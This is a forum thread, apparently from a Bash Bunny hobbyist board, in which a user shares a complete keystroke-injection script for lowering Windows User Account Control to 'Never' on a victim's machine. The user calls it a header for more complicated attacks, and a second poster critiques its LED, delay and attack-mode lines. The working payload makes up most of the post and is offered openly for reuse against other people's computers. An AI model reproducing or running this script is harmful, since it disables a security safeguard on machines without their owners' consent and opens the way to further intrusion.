Jump to content

Choreography for Descelating UAC Settings Windows 7+


Onus

Recommended Posts

I just refractored an old ducky script I wrote for lowering the user account control settings on a victem's machine..  

Its a bit dirty of a way to go about it, but seems to work on a windows ten machine no matter what the user's current account settings are.  Its nt really a stand alone but more of a header for more complicated attacks.

LED R G 300
Q DELAY 3000
LED B 100
Q DELAY 100
# Downgrade user account security to NEVER
# Minimize all windows
Q GUI d
Q GUI r
Q DELAY 300 
Q STRING useraccountcontrolsettings
Q ENTER
# deal with potential first prompt if security is too high in a way that won't mess with other possible outcomes
Q DELAY 300
Q DOWNARROW
Q UPARROW
Q DELAY 300
Q ENTER

# lower the bar
Q DELAY 500 
Q DOWNARROW
Q DOWNARROW
Q DOWNARROW
Q DOWNARROW
Q DELAY 300
Q TAB
Q ENTER
Q DELAY 500
# deal with potential final prompt if user had high level
Q LEFTARROW
Q ENTER
Q DELAY 500

Just thought I'd share, get thoughts, maybe save someone one some time dancing around all the possible keyboard combinations to deal with for a given user's settings and the.

 

Windows 7+ 

 

 

Edited by Onus
Link to comment
Share on other sites

4 hours ago, Onus said:

LED R G 300
Q DELAY 3000
LED B 100 Q
DELAY 100

I don't have my windows vm ready to test the overall script, but at least I don't understand your first four lines of code...

  1. setting the LED
  2. pause the HID to make keystrokes? You haven't typed anything by now... I'm not sure if a beginning pause is needed on the BashBunny as I don't know when the script will be executed (after the target host accepted the attack mode?)
  3. setting the LED to blue
  4. another pause for the HID (this one can definitely be removed and from my point of view at least on of the LED settings).

And you are missing to set the attack mode...

  • Upvote 1
Link to comment
Share on other sites

10 minutes ago, GermanNoob said:

I don't have my windows vm ready to test the overall script, but at least I don't understand your first four lines of code...

  1. setting the LED
  2. pause the HID to make keystrokes? You haven't typed anything by now... I'm not sure if a beginning pause is needed on the BashBunny as I don't know when the script will be executed (after the target host accepted the attack mode?)
  3. setting the LED to blue
  4. another pause for the HID (this one can definitely be removed and from my point of view at least on of the LED settings).

And you are missing to set the attack mode...

Sorry my bad on the attack mode.. I missed it in my copy/paste..  

2, This attack mode was both HID and Storage.. the initial delay is because I found on some windows machines, the storage mode will take a bit and open a finder window..  to make sure that finder window doesn't take focus in the middle of my script, i wait before typing anything.... 

1& 3.  The LED stuff is preference obviously..

 

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...